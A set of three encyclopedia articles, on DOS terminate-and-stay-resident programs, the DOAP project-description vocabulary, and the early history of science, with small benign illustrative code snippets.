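Real interrupt hooking is done in real-mode x86 assembly; as a language-neutral sketch of the chaining mechanism just described, here is a small simulation in which each "TSR" saves the previous handler and installs its own, forming a singly linked list traversed newest-first (the vector number and handler strings are purely illustrative):

```python
# Simulated interrupt vector table: INT 09h starts with a default handler.
interrupt_vector = {0x09: lambda: "default keyboard handler"}

def hook(vector_table, int_no, make_handler):
    """Install a new handler that keeps a reference to the old one,
    mirroring how a TSR stores the previous vector before replacing it."""
    old = vector_table[int_no]
    vector_table[int_no] = make_handler(old)

def tsr_a(old):
    def handler():
        # Do this TSR's work, then chain to the predecessor.
        return "TSR A saw the interrupt; " + old()
    return handler

hook(interrupt_vector, 0x09, tsr_a)
result = interrupt_vector[0x09]()  # "TSR A saw the interrupt; default keyboard handler"
```

Because each handler only knows its own predecessor, removing a handler from the middle of the chain requires cooperation from the TSRs installed after it, which is exactly the unloading problem discussed below.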
TSRs can be loaded at any time, either during the DOS startup sequence (for example, from AUTOEXEC.BAT) or at the user's request (for example, Borland's Sidekick and Turbo Debugger, Quicken's QuickPay, or FunStuff Software's Personal Calendar). Parts of DOS itself use this technique, especially in DOS versions 5.0 and later. For example, the DOSKEY command-line editor and various other utilities are installed by running them at the command line (manually, from AUTOEXEC.BAT, or through INSTALL from within CONFIG.SYS) rather than loading them as device drivers through DEVICE statements in CONFIG.SYS.
Some TSRs have no way to unload themselves, so they will remain in memory until a reboot. However, unloading is possible externally, using utilities like the MARK.EXE/RELEASE.EXE combo by TurboPower Software, or soft reboot TSRs which catch a specific key combination and release all TSRs loaded after them. As the chain of ISRs is singly linked, and a TSR may store the link to its predecessor anywhere it chooses, there is no general way for a TSR to remove itself from the chain. So usually a stub must be left in memory when unloading a TSR, causing memory fragmentation. This problem gave rise to TSR cooperation frameworks such as TesSeRact and AMIS.[3]
To manage problems with many TSRs sharing the same interrupt, a method called the Alternate Multiplex Interrupt Specification (AMIS) was proposed by Ralf D. Brown as an improvement over previously used services offered via INT 2Fh. AMIS provides ways to share software interrupts in a controlled manner. It is modeled after IBM's Interrupt Sharing Protocol, originally invented for sharing hardware interrupts of an x86 processor. AMIS services are available via INT 2Dh.[4]
The proposal never gained widespread traction among programmers in its day. It existed alongside several other competing specifications of varying sophistication.[5]
While very useful, or even essential to overcome DOS's limitations, TSRs have a reputation as troublemakers. Many hijack the operating system in varying documented or undocumented ways, often causing systems to crash on their activation or deactivation when used with particular applications or other TSRs.
By chaining the interrupt vectors, TSRs can take complete control of the computer. A TSR can have one of two behaviors: take full control of an interrupt and not pass it on, or do its own work and then chain to the previously installed handler so that other TSRs, and ultimately the original handler, also see the interrupt.
The terminate-and-stay-resident method is used by most DOS viruses and other malware, which can either take control of the PC or stay in the background. This malware can react to disk I/O or execution events by infecting executable (.EXE or .COM) files when they are run and data files when they are opened.
Additionally, in DOS all programs must be loaded into the first 640 KB of RAM (the conventional memory), even on computers with large amounts of physical RAM. TSRs are no exception, and take chunks from that 640 KB that are thus unavailable to other applications. This meant that writing a TSR was a challenge of achieving the smallest possible size for it, and checking it for compatibility with a lot of software products from different vendors—often a very frustrating task.
In the late 1980s and early 1990s, many video games on the PC platform pushed up against this limit and left less and less space for TSRs—even essential ones like CD-ROM drivers—and arranging things so that there was enough free RAM to run the games, while keeping the necessary TSRs present, became very complicated. Many gamers had several boot disks with different configurations for different games. In later versions of MS-DOS, "boot menu" scripts allowed various configurations to be selectable via a single menu entry. In the mid- to late 1990s, while many games were still written for DOS, the 640 KB limit was eventually overcome by putting parts of the game's data above the first 1 MB of memory and using the code below 640 KB to access that memory via expanded memory (EMS) and overlay techniques. An alternative later approach was to switch the CPU into protected mode by using DOS extenders and run the program there, which allowed code and data to reside in the extended memory area.[citation needed]
Because programming with many overlays is a challenge in and of itself, once a program was too big to fit entirely into about 512 KB, use of extended memory was almost always done using a third-party DOS extender implementing VCPI or DPMI, because it becomes much easier and faster to access memory above the 1 MB boundary, and possible to run code in that area, when the x86 processor is switched from real mode to protected mode. However, since DOS and most DOS programs run in real mode (VCPI or DPMI makes a protected-mode program look like a real-mode program to DOS and the rest of the system by switching back and forth between the two modes), DOS TSRs and device drivers also run in real mode, and so any time one gets control, the DOS extender has to switch back to real mode until it relinquishes control, incurring a time penalty (unless they utilize techniques such as DPMS or CLOAKING).
With the arrival of expanded memory boards and especially of Intel 80386 processors in the second half of the 1980s, it became possible to use memory above 640 KB to load TSRs. This required complex software solutions, named expanded memory managers. Some memory managers are QRAM and QEMM by Quarterdeck, 386MAX by Qualitas, CEMM by Compaq, and later EMM386 by Microsoft. The memory areas usable for loading TSRs above 640 KB are called "upper memory blocks" (UMBs) and loading programs into them is called loading high. Later, memory managers started including programs such as Quarterdeck's Optimize or Microsoft's MEMMAKER which try to maximize the available space in the first 640 KB by determining how best to allocate TSRs between low and high memory.
With the development of games using DOS extenders (an early example was Doom) which bypassed the 640 KB barrier, many of the issues relating to TSRs disappeared, and with the widespread adoption of Microsoft Windows and especially Windows 95 (followed by Windows 98) – which rendered most TSRs unnecessary and some TSRs incompatible – the TSR faded into obsolescence, though Win16 applications can do TSR-like tricks such as patching the interrupt descriptor table (IDT) because Windows allowed it. Windows Me removed the ability to shut down into a real-mode DOS kernel, so TSRs became useless there.
The Windows NT series (including Windows 2000, Windows XP, and later) replaced DOS completely and runs in protected mode or long mode (later 64-bit versions only) all the time, disabling the ability to switch to real mode, which is needed for TSRs to function. Instead, these operating systems have modern driver and service frameworks with memory protection and preemptive multitasking, allowing multiple programs and device drivers to run simultaneously without the need for special programming tricks; the kernel and its modules have been made exclusively responsible for modifying the interrupt table.
|
https://en.wikipedia.org/wiki/Terminate-and-stay-resident_program
|
DOAP (Description Of A Project) is an RDF Schema and XML vocabulary to describe software projects, in particular free and open source software.
It was created and initially developed by Edd Wilder-James (Edd Dumbill) to convey semantic information associated with open source software projects.[1][2]
There are currently generators, validators, viewers, and converters to enable more projects to be included in the semantic web. In 2007, Freecode listed 43,000 projects as published with DOAP.[3] It was used in the Python Package Index but is no longer supported there.
In 2025, it is normal practice for DOAP files to be included with GNOME source code.[4]
Major properties include: homepage, developer, programming-language, os.
The following is an example in RDF/XML:
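(The original example did not survive extraction; the following minimal DOAP description is illustrative, with a placeholder project name and homepage, using the major properties listed above and the real DOAP namespace.)

```xml
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:doap="http://usefulinc.com/ns/doap#">
  <doap:Project>
    <doap:name>ExampleProject</doap:name>
    <doap:homepage rdf:resource="https://example.org/project"/>
    <doap:programming-language>Python</doap:programming-language>
    <doap:os>linux</doap:os>
  </doap:Project>
</rdf:RDF>
```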
Other properties include: implements specification, anonymous root, platform, browse, mailing list, category, description, helper, tester, short description, audience, screenshots, translator, module, documenter, wiki, repository, name, repository location, language, service endpoint, created, download mirror, vendor, old homepage, revision, download page, license, bug database, maintainer, blog, file-release, and release.[5]
|
https://en.wikipedia.org/wiki/DOAP
|
The history of science covers the development of science from ancient times to the present. It encompasses all three major branches of science: natural, social, and formal.[1] Protoscience, early sciences, and natural philosophies such as alchemy and astrology that existed during the Bronze Age, Iron Age, classical antiquity and the Middle Ages declined during the early modern period after the establishment of formal disciplines of science in the Age of Enlightenment.
The earliest roots of scientific thinking and practice can be traced to Ancient Egypt and Mesopotamia during the 3rd and 2nd millennia BCE.[2][3] These civilizations' contributions to mathematics, astronomy, and medicine influenced later Greek natural philosophy of classical antiquity, wherein formal attempts were made to provide explanations of events in the physical world based on natural causes.[2][3] After the fall of the Western Roman Empire, knowledge of Greek conceptions of the world deteriorated in Latin-speaking Western Europe during the early centuries (400 to 1000 CE) of the Middle Ages,[4] but continued to thrive in the Greek-speaking Byzantine Empire. Aided by translations of Greek texts, the Hellenistic worldview was preserved and absorbed into the Arabic-speaking Muslim world during the Islamic Golden Age.[5] The recovery and assimilation of Greek works and Islamic inquiries into Western Europe from the 10th to 13th century revived the learning of natural philosophy in the West.[4][6] Traditions of early science were also developed in ancient India and separately in ancient China, the Chinese model having influenced Vietnam, Korea and Japan before Western exploration.[7] Among the Pre-Columbian peoples of Mesoamerica, the Zapotec civilization established their first known traditions of astronomy and mathematics for producing calendars, followed by other civilizations such as the Maya.
Natural philosophy was transformed by the Scientific Revolution that transpired during the 16th and 17th centuries in Europe,[8][9][10] as new ideas and discoveries departed from previous Greek conceptions and traditions.[11][12][13][14] The New Science that emerged was more mechanistic in its worldview, more integrated with mathematics, and more reliable and open as its knowledge was based on a newly defined scientific method.[12][15][16] More "revolutions" in subsequent centuries soon followed. The chemical revolution of the 18th century, for instance, introduced new quantitative methods and measurements for chemistry.[17] In the 19th century, new perspectives regarding the conservation of energy, age of Earth, and evolution came into focus.[18][19][20][21][22][23] And in the 20th century, new discoveries in genetics and physics laid the foundations for new subdisciplines such as molecular biology and particle physics.[24][25] Moreover, industrial and military concerns as well as the increasing complexity of new research endeavors ushered in the era of "big science," particularly after World War II.[24][25][26]
The nature of the history of science is a topic of debate (as is, by implication, the definition of science itself). The history of science is often seen as a linear story of progress,[27] but historians have come to see the story as more complex.[28][29][30] Alfred Edward Taylor has characterised lean periods in the advance of scientific discovery as "periodical bankruptcies of science".[31]
Science is a human activity, and scientific contributions have come from people from a wide range of different backgrounds and cultures. Historians of science increasingly see their field as part of a global history of exchange, conflict and collaboration.[32]
The relationship between science and religion has been variously characterized in terms of "conflict", "harmony", "complexity", and "mutual independence", among others. Events in Europe such as the Galileo affair of the early 17th century – associated with the scientific revolution and the Age of Enlightenment – led scholars such as John William Draper to postulate (c. 1874) a conflict thesis, suggesting that religion and science have been in conflict methodologically, factually and politically throughout history. The "conflict thesis" has since lost favor among the majority of contemporary scientists and historians of science.[33][34][35] However, some contemporary philosophers and scientists, such as Richard Dawkins,[36] still subscribe to this thesis.
Historians have emphasized[37] that trust is necessary for agreement on claims about nature. In this light, the 1660 establishment of the Royal Society and its code of experiment – trustworthy because witnessed by its members – has become an important chapter in the historiography of science.[38] Many people in modern history (typically women and persons of color) were excluded from elite scientific communities and characterized by the science establishment as inferior. Historians in the 1980s and 1990s described the structural barriers to participation and began to recover the contributions of overlooked individuals.[39][40] Historians have also investigated the mundane practices of science such as fieldwork and specimen collection,[41] correspondence,[42] drawing,[43] record-keeping,[44] and the use of laboratory and field equipment.[45]
In prehistoric times, knowledge and technique were passed from generation to generation in an oral tradition. For instance, the domestication of maize for agriculture has been dated to about 9,000 years ago in southern Mexico, before the development of writing systems.[46][47][48] Similarly, archaeological evidence indicates the development of astronomical knowledge in preliterate societies.[49][50]
The oral tradition of preliterate societies had several features, the first of which was its fluidity.[2] New information was constantly absorbed and adjusted to new circumstances or community needs. There were no archives or reports. This fluidity was closely related to the practical need to explain and justify a present state of affairs.[2] Another feature was the tendency to describe the universe as just sky and earth, with a potential underworld. They were also prone to identify causes with beginnings, thereby providing a historical origin with an explanation. There was also a reliance on a "medicine man" or "wise woman" for healing, knowledge of divine or demonic causes of diseases, and in more extreme cases, for rituals such as exorcism, divination, songs, and incantations.[2] Finally, there was an inclination to unquestioningly accept explanations that might be deemed implausible in more modern times, while at the same time not being aware that such credulous behaviors could have posed problems.[2]
The development of writing enabled humans to store and communicate knowledge across generations with much greater accuracy. Its invention was a prerequisite for the development of philosophy and later science in ancient times.[2] Moreover, the extent to which philosophy and science would flourish in ancient times depended on the efficiency of a writing system (e.g., use of alphabets).[2]
The earliest roots of science can be traced to the Ancient Near East, c. 3000–1200 BCE – in particular to Ancient Egypt and Mesopotamia.[2]
Starting c. 3000 BCE, the ancient Egyptians developed a numbering system that was decimal in character and had oriented their knowledge of geometry to solving practical problems such as those of surveyors and builders.[2] Their development of geometry was itself a necessary outgrowth of surveying to preserve the layout and ownership of farmland, which was flooded annually by the Nile. The 3-4-5 right triangle and other rules of geometry were used to build rectilinear structures, and the post and lintel architecture of Egypt.
Egypt was also a center of alchemy research for much of the Mediterranean. According to the medical papyri (written c. 2500–1200 BCE), the ancient Egyptians believed that disease was mainly caused by the invasion of bodies by evil forces or spirits.[2] Thus, in addition to medicine, therapies included prayer, incantation, and ritual.[2] The Ebers Papyrus, written c. 1600 BCE, contains medical recipes for treating diseases related to the eyes, mouth, skin, internal organs, and extremities, as well as abscesses, wounds, burns, ulcers, swollen glands, tumors, headaches, and bad breath. The Edwin Smith Papyrus, written at about the same time, contains a surgical manual for treating wounds, fractures, and dislocations. The Egyptians believed that the effectiveness of their medicines depended on preparation and administration under appropriate rituals.[2] Medical historians believe that ancient Egyptian pharmacology, for example, was largely ineffective.[51] Both the Ebers and Edwin Smith papyri applied the following components to the treatment of disease: examination, diagnosis, treatment, and prognosis,[52] which display strong parallels to the basic empirical method of science and, according to G. E. R. Lloyd,[53] played a significant role in the development of this methodology.
The ancient Egyptians even developed an official calendar that contained twelve months of thirty days each, plus five days at the end of the year.[2] Unlike the Babylonian calendar or the ones used in Greek city-states at the time, the official Egyptian calendar was much simpler, as it was fixed and did not take lunar and solar cycles into consideration.[2]
The ancient Mesopotamians had extensive knowledge about the chemical properties of clay, sand, metal ore, bitumen, stone, and other natural materials, and applied this knowledge to practical use in manufacturing pottery, faience, glass, soap, metals, lime plaster, and waterproofing. Metallurgy required knowledge about the properties of metals. Nonetheless, the Mesopotamians seem to have had little interest in gathering information about the natural world for the mere sake of gathering information and were far more interested in studying the manner in which the gods had ordered the universe. Biology of non-human organisms was generally only written about in the context of mainstream academic disciplines. Animal physiology was studied extensively for the purpose of divination; the anatomy of the liver, which was seen as an important organ in haruspicy, was studied in particularly intensive detail. Animal behavior was also studied for divinatory purposes. Most information about the training and domestication of animals was probably transmitted orally without being written down, but one text dealing with the training of horses has survived.[54]
The ancient Mesopotamians had no distinction between "rational science" and magic.[55][56][57] When a person became ill, doctors prescribed magical formulas to be recited as well as medicinal treatments.[55][56][57][54] The earliest medical prescriptions appear in Sumerian during the Third Dynasty of Ur (c. 2112 BCE – c. 2004 BCE).[58] The most extensive Babylonian medical text, however, is the Diagnostic Handbook written by the ummânū, or chief scholar, Esagil-kin-apli of Borsippa,[59] during the reign of the Babylonian king Adad-apla-iddina (1069–1046 BCE).[60] In East Semitic cultures, the main medicinal authority was a kind of exorcist-healer known as an āšipu.[55][56][57] The profession was generally passed down from father to son and was held in extremely high regard.[55] Of less frequent recourse was another kind of healer known as an asu, who corresponds more closely to a modern physician and treated physical symptoms using primarily folk remedies composed of various herbs, animal products, and minerals, as well as potions, enemas, and ointments or poultices. These physicians, who could be either male or female, also dressed wounds, set limbs, and performed simple surgeries. The ancient Mesopotamians also practiced prophylaxis and took measures to prevent the spread of disease.[54]
In Babylonian astronomy, records of the motions of the stars, planets, and the moon are left on thousands of clay tablets created by scribes. Even today, astronomical periods identified by Mesopotamian proto-scientists are still widely used in Western calendars, such as the solar year and the lunar month. Using this data, they developed mathematical methods to compute the changing length of daylight in the course of the year, predict the appearances and disappearances of the Moon and planets, and eclipses of the Sun and Moon. Only a few astronomers' names are known, such as that of Kidinnu, a Chaldean astronomer and mathematician. Kidinnu's value for the solar year is in use for today's calendars. Babylonian astronomy was "the first and highly successful attempt at giving a refined mathematical description of astronomical phenomena." According to the historian A. Aaboe, "all subsequent varieties of scientific astronomy, in the Hellenistic world, in India, in Islam, and in the West—if not indeed all subsequent endeavour in the exact sciences—depend upon Babylonian astronomy in decisive and fundamental ways."[61]
To the Babylonians and other Near Eastern cultures, messages from the gods or omens were concealed in all natural phenomena and could be deciphered and interpreted by those who were adept.[2] Hence, it was believed that the gods could speak through all terrestrial objects (e.g., animal entrails, dreams, malformed births, or even the color of a dog urinating on a person) and celestial phenomena.[2] Moreover, Babylonian astrology was inseparable from Babylonian astronomy.
The Mesopotamian cuneiform tablet Plimpton 322, dating to the 18th century BCE, records a number of Pythagorean triplets, such as (3, 4, 5) and (5, 12, 13),[62] hinting that the ancient Mesopotamians might have been aware of the Pythagorean theorem over a millennium before Pythagoras.[63][64][65]
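The defining relation behind the triples named above can be checked directly (a small illustrative snippet, not part of the article):

```python
def is_pythagorean_triple(a, b, c):
    """Check whether a^2 + b^2 = c^2, the relation behind the numbers
    recorded on Plimpton 322."""
    return a * a + b * b == c * c

# The two triples cited in the text.
triples = [(3, 4, 5), (5, 12, 13)]
checks = [is_pythagorean_triple(a, b, c) for a, b, c in triples]
```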
Mathematical achievements from Mesopotamia had some influence on the development of mathematics in India, and there were confirmed transmissions of mathematical ideas between India and China, which were bidirectional.[66] Nevertheless, the mathematical and scientific achievements in India and particularly in China occurred largely independently[67] from those of Europe, and the confirmed early influences that these two civilizations had on the development of science in Europe in the pre-modern era were indirect, with Mesopotamia and later the Islamic world acting as intermediaries.[66] The arrival of modern science, which grew out of the Scientific Revolution, in India and China and the greater Asian region in general can be traced to the scientific activities of Jesuit missionaries who were interested in studying the region's flora and fauna during the 16th to 17th century.[68]
The earliest traces of mathematical knowledge in the Indian subcontinent appear with the Indus Valley Civilisation (c. 3300 – c. 1300 BCE). The people of this civilization made bricks whose dimensions were in the proportion 4:2:1, which is favorable for the stability of a brick structure.[69] They also tried to standardize the measurement of length to a high degree of accuracy. They designed a ruler—the Mohenjo-daro ruler—whose length of approximately 1.32 in (34 mm) was divided into ten equal parts. Bricks manufactured in ancient Mohenjo-daro often had dimensions that were integral multiples of this unit of length.[70]
The Bakhshali manuscript contains problems involving arithmetic, algebra and geometry, including mensuration. The topics covered include fractions, square roots, arithmetic and geometric progressions, solutions of simple equations, simultaneous linear equations, quadratic equations and indeterminate equations of the second degree.[71] In the 3rd century BCE, Pingala presented the Pingala-sutras, the earliest known treatise on Sanskrit prosody.[72] He also presented a numerical system formed by adding one to the sum of place values.[73] Pingala's work also includes material related to the Fibonacci numbers, called mātrāmeru.[74]
Indian astronomer and mathematician Aryabhata (476–550), in his Aryabhatiya (499), introduced the sine function in trigonometry and the number 0. In 628, Brahmagupta suggested that gravity was a force of attraction.[75][76] He also lucidly explained the use of zero as both a placeholder and a decimal digit, along with the Hindu–Arabic numeral system now used universally throughout the world. Arabic translations of the two astronomers' texts were soon available in the Islamic world, introducing what would become Arabic numerals to the Islamic world by the 9th century.[77][78]
Narayana Pandita (1340–1400[79]) was an Indian mathematician. Plofker writes that his texts were the most significant Sanskrit mathematics treatises after those of Bhaskara II, other than the Kerala school.[80]: 52 He wrote the Ganita Kaumudi (lit. "Moonlight of mathematics") in 1356 about mathematical operations.[81] The work anticipated many developments in combinatorics.
Between the 14th and 16th centuries, the Kerala school of astronomy and mathematics made significant advances in astronomy and especially mathematics, including fields such as trigonometry and analysis. In particular, Madhava of Sangamagrama led the advancement of analysis by providing infinite (Taylor) series expansions of some trigonometric functions and approximations of π.[82] Parameshvara (1380–1460) presented a case of the mean value theorem in his commentaries on Govindasvāmi and Bhāskara II.[83] The Yuktibhāṣā was written by Jyeshtadeva in 1530.[84]
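The best known of these results can be stated explicitly: the Madhava series for the sine and the series for π now often called the Madhava–Leibniz series:

```latex
\sin\theta \;=\; \theta - \frac{\theta^3}{3!} + \frac{\theta^5}{5!} - \frac{\theta^7}{7!} + \cdots,
\qquad
\frac{\pi}{4} \;=\; 1 - \frac{1}{3} + \frac{1}{5} - \frac{1}{7} + \cdots
```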
The first textual mention of astronomical concepts comes from the Vedas, the religious literature of India.[85] According to Sarma (2008): "One finds in the Rigveda intelligent speculations about the genesis of the universe from nonexistence, the configuration of the universe, the spherical self-supporting earth, and the year of 360 days divided into 12 equal parts of 30 days each with a periodical intercalary month."[85]
The first 12 chapters of the Siddhanta Shiromani, written by Bhāskara in the 12th century, cover topics such as: mean longitudes of the planets; true longitudes of the planets; the three problems of diurnal rotation; syzygies; lunar eclipses; solar eclipses; latitudes of the planets; risings and settings; the moon's crescent; conjunctions of the planets with each other; conjunctions of the planets with the fixed stars; and the patas of the sun and moon. The 13 chapters of the second part cover the nature of the sphere, as well as significant astronomical and trigonometric calculations based on it.
In the Tantrasangraha treatise, Nilakantha Somayaji updated the Aryabhatan model for the interior planets, Mercury and Venus; the equation he specified for the center of these planets was more accurate than any in European or Islamic astronomy until the time of Johannes Kepler in the 17th century.[86] Jai Singh II of Jaipur constructed five observatories called Jantar Mantars, in New Delhi, Jaipur, Ujjain, Mathura and Varanasi; they were completed between 1724 and 1735.[87]
Some of the earliest linguistic activities can be found in Iron Age India (1st millennium BCE) with the analysis of Sanskrit for the purpose of the correct recitation and interpretation of Vedic texts. The most notable grammarian of Sanskrit was Pāṇini (c. 520–460 BCE), whose grammar formulates close to 4,000 rules for Sanskrit. Inherent in his analytic approach are the concepts of the phoneme, the morpheme and the root. The Tolkāppiyam text, composed in the early centuries of the common era,[88] is a comprehensive text on Tamil grammar, which includes sutras on orthography, phonology, etymology, morphology, semantics, prosody, sentence structure and the significance of context in language.
Findings from Neolithic graveyards in what is now Pakistan show evidence of proto-dentistry among an early farming culture.[89] The ancient text Suśrutasamhitā of Suśruta describes procedures for various forms of surgery, including rhinoplasty, the repair of torn ear lobes, perineal lithotomy, cataract surgery, and several other excisions and surgical procedures.[90][91] The Charaka Samhita of Charaka describes ancient theories on the human body, etiology, symptomatology and therapeutics for a wide range of diseases.[92] It also includes sections on the importance of diet, hygiene, prevention, medical education, and the teamwork of physician, nurse and patient necessary for recovery to health.[93][94][95]
The Arthaśāstra is an ancient Indian treatise on statecraft, economic policy and military strategy by Kautilya[96] and Viṣhṇugupta,[97] who are traditionally identified with Chāṇakya (c. 350–283 BCE). In this treatise, the behaviors and relationships of the people, the King, the State, the Government Superintendents, Courtiers, Enemies, Invaders, and Corporations are analyzed and documented. Roger Boesche describes the Arthaśāstra as "a book of political realism, a book analyzing how the political world does work and not very often stating how it ought to work, a book that frequently discloses to a king what calculating and sometimes brutal measures he must carry out to preserve the state and the common good."[98]
The development of Indian logic dates back to the Chandahsutra of Pingala and the anviksiki of Medhatithi Gautama (c. 6th century BCE); the Sanskrit grammar rules of Pāṇini (c. 5th century BCE); the Vaisheshika school's analysis of atomism (c. 6th century BCE to 2nd century BCE); the analysis of inference by Gotama (c. 6th century BCE to 2nd century CE), founder of the Nyaya school of Hindu philosophy; and the tetralemma of Nagarjuna (c. 2nd century CE).
Indian logic stands as one of the three original traditions of logic, alongside the Greek and the Chinese. The Indian tradition continued to develop from early to modern times, in the form of the Navya-Nyāya school of logic.
In the 2nd century, the Buddhist philosopher Nagarjuna refined the Catuskoti form of logic. The Catuskoti is also often glossed Tetralemma (Greek), the name for a largely comparable, but not equatable, 'four corner argument' within the tradition of classical logic.
Navya-Nyāya developed a sophisticated language and conceptual scheme that allowed it to raise, analyse, and solve problems in logic and epistemology. It systematised all the Nyāya concepts into four main categories: sense or perception (pratyakşa), inference (anumāna), comparison or similarity (upamāna), and testimony (sound or word; śabda).
From the earliest times the Chinese used a positional decimal system on counting boards in order to calculate. To express 10, a single rod is placed in the second box from the right. The spoken language uses a similar system to English: e.g. four thousand two hundred and seven. No symbol was used for zero. By the 1st century BCE, negative numbers and decimal fractions were in use, and The Nine Chapters on the Mathematical Art included methods for extracting higher-order roots by Horner's method, solving linear equations, and applying the Pythagorean theorem. Cubic equations were solved in the Tang dynasty, and solutions of equations of degree higher than 3 appeared in print in 1245 CE in the work of Ch'in Chiu-shao. Pascal's triangle for binomial coefficients was described around 1100 by Jia Xian.[99]
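Two of the techniques above can be sketched in modern notation. Horner's method rests on nested multiplication, the same idea underlying the Chinese root-extraction procedures, and Jia Xian's triangle is what is now called Pascal's triangle. This is an illustrative sketch, not a reconstruction of the historical counting-board algorithms:

```python
def horner(coeffs, x):
    """Evaluate a polynomial by nested multiplication (Horner's scheme).
    `coeffs` are ordered from the highest-degree term down."""
    result = 0
    for c in coeffs:
        result = result * x + c
    return result

def jia_xian_triangle(rows):
    """First `rows` rows of binomial coefficients, each row built by
    summing adjacent entries of the previous row."""
    triangle = [[1]]
    for _ in range(rows - 1):
        prev = triangle[-1]
        triangle.append([1] + [prev[i] + prev[i + 1]
                               for i in range(len(prev) - 1)] + [1])
    return triangle
```

For example, `horner([2, 0, -1], 3)` evaluates 2x² − 1 at x = 3 with only two multiplications.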
Although the first attempts at an axiomatization of geometry appear in the Mohist canon in 330 BCE, Liu Hui developed algebraic methods in geometry in the 3rd century CE and also calculated π to 5 significant figures. In 480, Zu Chongzhi improved on this by discovering the ratio 355/113, which remained the most accurate value for 1200 years.
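Zu Chongzhi's ratio can be checked directly against the modern value of π; it is accurate to six decimal places, which is why it stood unrivalled for so long:

```python
import math

# Zu Chongzhi's approximation, traditionally called the "milü".
milu = 355 / 113

# Absolute error against the modern value of pi: about 2.7e-7,
# i.e. correct to six decimal places.
error = abs(milu - math.pi)
```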
Astronomical observations from China constitute the longest continuous sequence from any civilization and include records of sunspots (112 records from 364 BCE), supernovas (such as that of 1054), and lunar and solar eclipses. By the 12th century, Chinese astronomers could predict eclipses reasonably accurately, but the knowledge of this was lost during the Ming dynasty, so that the Jesuit Matteo Ricci gained much favor in 1601 by his predictions.[101] By 635, Chinese astronomers had observed that the tails of comets always point away from the sun.
From antiquity, the Chinese used an equatorial system for describing the skies, and a star map from 940 was drawn using a cylindrical (Mercator) projection. The use of an armillary sphere is recorded from the 4th century BCE, and a sphere permanently mounted on an equatorial axis from 52 BCE. In 125 CE Zhang Heng used water power to rotate the sphere in real time. This included rings for the meridian and ecliptic. By 1270 they had incorporated the principles of the Arab torquetum.
In the Song Empire (960–1279) of Imperial China, Chinese scholar-officials unearthed, studied, and cataloged ancient artifacts.
To better prepare for calamities, Zhang Heng invented a seismometer in 132 CE which provided instant alert to authorities in the capital Luoyang that an earthquake had occurred in a location indicated by a specific cardinal or ordinal direction.[102][103] Although no tremors could be felt in the capital when Zhang told the court that an earthquake had just occurred in the northwest, a message came soon afterwards that an earthquake had indeed struck 400 to 500 km (250 to 310 mi) northwest of Luoyang (in what is now modern Gansu).[104] Zhang called his device the 'instrument for measuring the seasonal winds and the movements of the Earth' (Houfeng didong yi 候风地动仪), so named because he and others thought that earthquakes were most likely caused by the enormous compression of trapped air.[105]
There are many notable contributors to early Chinese disciplines, inventions, and practices throughout the ages. One of the best examples is the medieval Song Chinese Shen Kuo (1031–1095), a polymath and statesman who was the first to describe the magnetic-needle compass used for navigation, discovered the concept of true north, improved the design of the astronomical gnomon, armillary sphere, sight tube, and clepsydra, and described the use of drydocks to repair boats. After observing the natural process of the inundation of silt and the discovery of marine fossils in the Taihang Mountains (hundreds of miles from the Pacific Ocean), Shen Kuo devised a theory of land formation, or geomorphology. He also adopted a theory of gradual climate change in regions over time, after observing petrified bamboo found underground at Yan'an, Shaanxi. If not for Shen Kuo's writing,[106] the architectural works of Yu Hao would be little known, along with the inventor of movable type printing, Bi Sheng (990–1051). Shen's contemporary Su Song (1020–1101) was also a brilliant polymath, an astronomer who created a celestial atlas of star maps, wrote a treatise related to botany, zoology, mineralogy, and metallurgy, and erected a large astronomical clock tower in Kaifeng city in 1088. To operate the crowning armillary sphere, his clock tower featured an escapement mechanism and the world's oldest known use of an endless power-transmitting chain drive.[107]
The Jesuit China missions of the 16th and 17th centuries "learned to appreciate the scientific achievements of this ancient culture and made them known in Europe. Through their correspondence European scientists first learned about the Chinese science and culture."[108] Western academic thought on the history of Chinese technology and science was galvanized by the work of Joseph Needham and the Needham Research Institute. Among the technological accomplishments of China were, according to the British scholar Needham, the water-powered celestial globe (Zhang Heng),[109] dry docks, sliding calipers, the double-action piston pump,[109] the blast furnace,[110] the multi-tube seed drill, the wheelbarrow,[110] the suspension bridge,[110] the winnowing machine,[109] gunpowder,[110] the raised-relief map, toilet paper,[110] the efficient harness,[109] along with contributions in logic, astronomy, medicine, and other fields.
However, cultural factors prevented these Chinese achievements from developing into "modern science". According to Needham, it may have been the religious and philosophical framework of Chinese intellectuals which made them unable to accept the ideas of laws of nature:
It was not that there was no order in nature for the Chinese, but rather that it was not an order ordained by a rational personal being, and hence there was no conviction that rational personal beings would be able to spell out in their lesser earthly languages the divine code of laws which he had decreed aforetime. The Taoists, indeed, would have scorned such an idea as being too naïve for the subtlety and complexity of the universe as they intuited it.[111]
During the Middle Formative Period (c. 900 BCE – c. 300 BCE) of Pre-Columbian Mesoamerica, the Zapotec civilization, heavily influenced by the Olmec civilization, established the first known full writing system of the region (possibly predated by the Olmec Cascajal Block),[112] as well as the first known astronomical calendar in Mesoamerica.[113][114] Following a period of initial urban development in the Preclassical period, the Classic Maya civilization (c. 250 CE – c. 900 CE) built on the shared heritage of the Olmecs by developing the most sophisticated systems of writing, astronomy, calendrical science, and mathematics among Mesoamerican peoples.[113] The Maya developed a positional numeral system with a base of 20 that included the use of zero for constructing their calendars.[115][116] Maya writing, which was developed by 200 BCE, widespread by 100 BCE, and rooted in Olmec and Zapotec scripts, contains easily discernible calendar dates in the form of logographs representing numbers, coefficients, and calendar periods amounting to 20 days and even 20 years for tracking social, religious, political, and economic events in 360-day years.[117]
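The positional base-20 idea can be illustrated with a short sketch. Note the simplification: in Maya calendrical counts the second-lowest place actually carried 18 rather than 20 (giving the 360-day year mentioned above); plain base 20 is shown here, and the function name is my own:

```python
def to_vigesimal(n):
    """Return the base-20 (vigesimal) digits of a non-negative integer,
    most significant digit first; 0 maps to [0]."""
    if n == 0:
        return [0]
    digits = []
    while n > 0:
        digits.append(n % 20)   # lowest place first
        n //= 20
    return digits[::-1]         # reverse to most-significant-first
```

For instance, 33 is one twenty plus thirteen, so `to_vigesimal(33)` gives `[1, 13]`.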
The contributions of the Ancient Egyptians and Mesopotamians in the areas of astronomy, mathematics, and medicine had entered and shaped Greek natural philosophy of classical antiquity, whereby formal attempts were made to provide explanations of events in the physical world based on natural causes.[2][3] Inquiries were also aimed at such practical goals as establishing a reliable calendar or determining how to cure a variety of illnesses. The ancient people who were considered the first scientists may have thought of themselves as natural philosophers, as practitioners of a skilled profession (for example, physicians), or as followers of a religious tradition (for example, temple healers).
